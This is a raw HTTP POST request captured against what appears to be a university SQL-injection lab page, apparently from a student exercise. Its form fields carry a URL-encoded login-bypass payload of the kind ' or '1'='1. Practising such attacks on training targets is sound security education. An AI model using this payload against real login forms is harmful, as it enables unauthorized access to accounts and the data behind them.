POST /sqli/sql_level1.php HTTP/1.1
Host: seclva.ifs.tuwien.ac.at
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://seclva.ifs.tuwien.ac.at/sqli/sql_level1.php
Cookie: stud_id=1225253
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

user=asdf+%27+or+%271%27%3D%271&pwd=%27+or+%271%27%3D%271&set_answer=Ok